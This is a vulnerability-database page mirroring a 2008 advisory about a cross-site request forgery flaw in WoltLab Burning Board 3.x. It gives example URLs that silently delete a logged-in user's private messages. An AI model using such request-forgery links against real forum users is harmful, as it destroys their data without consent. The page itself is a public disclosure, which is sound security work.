Lucene search

K

woltlab3-xsrf.txt

๐Ÿ—“๏ธย 30 Jan 2008ย 00:00:00Reported byย NBBNTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 13ย Views

WoltLab Burning Board 3.x.x PM Delete Cross-Site Request Forgery Vulnerabilit

Show more
Code
`#############################################################################  
WoltLab Burning Board 3.x.x PM Delete Cross-Site Request Forgery Vulnerability  
by NBBN. Founded: 25 December 2007  
#############################################################################  
  
  
Examples:  
http://domain.tld/wbb3/index.php?page=PM&action=delete&pmID=[pmid]  
http://domain.tld/wbb3/index.php?page=PM&action=delete&pmID=1  
  
Fix:   
  
Wait for a fix. Or never surf in other sites, if you have autologin on and   
don't click links, when you are logged in.   
  
Vulnerability Versions:  
  
I tested it only on 3.0.1 but I think that all version of 3 are vuln.  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
30 Jan 2008 00:00Current
7.4High risk
Vulners AI Score7.4
13
.json
Report